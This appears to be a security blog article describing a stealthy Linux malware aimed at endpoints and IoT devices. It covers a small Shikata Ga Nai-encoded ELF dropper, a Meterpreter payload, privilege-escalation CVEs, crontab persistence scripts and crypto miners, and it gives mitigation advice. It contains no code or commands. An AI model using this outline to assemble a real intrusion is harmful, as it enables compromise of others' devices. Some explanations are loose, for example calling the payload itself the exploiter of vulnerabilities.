This article examines a newly discovered Linux malware that specifically targets endpoints and Internet of Things (IoT) devices. The malware utilizes a small ELF file, occupying minimal space of approximately 300 bytes. It employs the Shikata Ga Nai encoder to encode the shellcode and requires the activation of modules for execution. Through decoding loops, dynamic instruction substitution, block ordering, and register selection, the malware decrypts the shellcode, subsequently executing it. The malware employs the Metasploit Meterpreter payload, enabling remote control of the compromised host and facilitating code execution. Additionally, it downloads and executes the Mettle program, which retrieves a smaller ELF file and exploits vulnerabilities (CVE-2021-4034, CVE-2021-3493). Furthermore, the malware employs various scripts to ensure persistence, including the installation of crontab commands, execution of a crypto miner, and retrieval of a crypto miner. To mitigate the risks associated with this malware, it is advisable to regularly update software with the latest security patches, install anti-virus and Endpoint Detection and Response (EDR) software on endpoints, implement a backup system for server files, and adopt a robust security strategy.
Key Takeaways
- The malware uses a small ELF file to spread and infect endpoints and IoT devices.
- It employs a decoding process with dynamic substitution of instructions and block ordering to execute the shellcode after decryption.
- The malware utilizes the Metasploit Meterpreter payload, allowing remote control of the infected host and code execution by the attacker.
- Persistence is achieved through the use of various scripts that add crontab commands to execute crypto miners.
Infection Chain
The infection chain of the new stealthy Linux malware involves the spread of a small ELF file that contains encoded shellcode and requires the activation of modules for execution. The malware employs various techniques in its decoding process, including dynamic substitution of instructions, dynamic block ordering, and dynamic selection of registers. These techniques make it challenging to detect and analyze the malware’s behavior. To prevent infection in endpoints and IoT devices, it is crucial to implement countermeasures such as updating software with the latest security patches, installing anti-virus and EDR software, using backup systems for server files, and implementing a robust security strategy. These measures can help mitigate the risk of malware infiltration and protect the integrity of the affected systems.
Decoding Process
During the decoding process, the malware utilizes dynamic substitution of instructions, dynamic block ordering, and dynamic selection of registers to decrypt and execute the shellcode. This technique allows the malware to evade detection and analysis by constantly changing its execution flow and behavior. The dynamic substitution of instructions involves replacing certain instructions with equivalent ones at runtime, making it difficult for security tools to identify and analyze the malware’s functionality. Dynamic block ordering refers to the rearrangement of code blocks within the malware’s execution flow, further obfuscating its behavior and making it harder to understand its purpose. By employing these dynamic techniques, the malware aims to bypass security defenses and successfully execute its payload without being detected.
Metasploit Meterpreter Payload
Utilizing the Metasploit Meterpreter payload, an attacker can remotely control a host and execute code, enabling them to exploit vulnerabilities and fetch smaller ELF files for malicious purposes. The remote control capabilities of the Metasploit Meterpreter payload allow the attacker to gain unauthorized access to the infected system, giving them full control over the compromised endpoint or IoT device. This payload plays a crucial role in the malware infection chain, as it facilitates the execution of the malicious code and the exploitation of vulnerabilities such as CVE 2021-4034 and CVE 2021-3493. These vulnerabilities serve as entry points for the attacker, allowing them to bypass security measures and gain privileged access to the target system. By leveraging these vulnerabilities, the attacker can further propagate the malware and carry out their malicious activities.
Frequently Asked Questions
How can the malware be spread to endpoints and IoT devices?
Common entry points for malware on endpoints and IoT devices include downloading malicious files, visiting compromised websites, opening infected email attachments, and connecting to infected external devices. Preventing the spread of malware involves updating software, using antivirus and EDR software, implementing robust security measures, and practicing safe browsing habits.
What techniques does the malware use for encoding and decoding its shellcode?
The malware utilizes dynamic substitution of instructions, dynamic block ordering, and dynamic selection of registers for encoding and decoding its shellcode. These techniques obfuscate the shellcode in the Linux malware, making it difficult to detect and analyze.
What vulnerabilities does the Metasploit Meterpreter Payload exploit?
The Metasploit meterpreter payload exploits common vulnerabilities to gain control of a host. It allows remote code execution and enables the attacker to fetch and execute smaller ELF files.
What scripts are used by the malware for persistence?
Scripts are used by malware for persistence to ensure that the malicious code remains on the infected system even after a reboot. Commonly used scripts include unix.sh, brict.sh, politrict.sh, truct.sh, and restrict.sh. These scripts enable the malware to execute various actions, such as installing crontab commands and downloading crypto miners, thereby maintaining persistence on the compromised device.
What recommendations are provided to protect against this malware?
To protect against malware targeting endpoints and IoT devices, it is recommended to update software with the latest security patches, install anti-virus and EDR software, use backup systems for server files, and implement a robust security strategy focusing on Endpoint Protection and IoT Security.
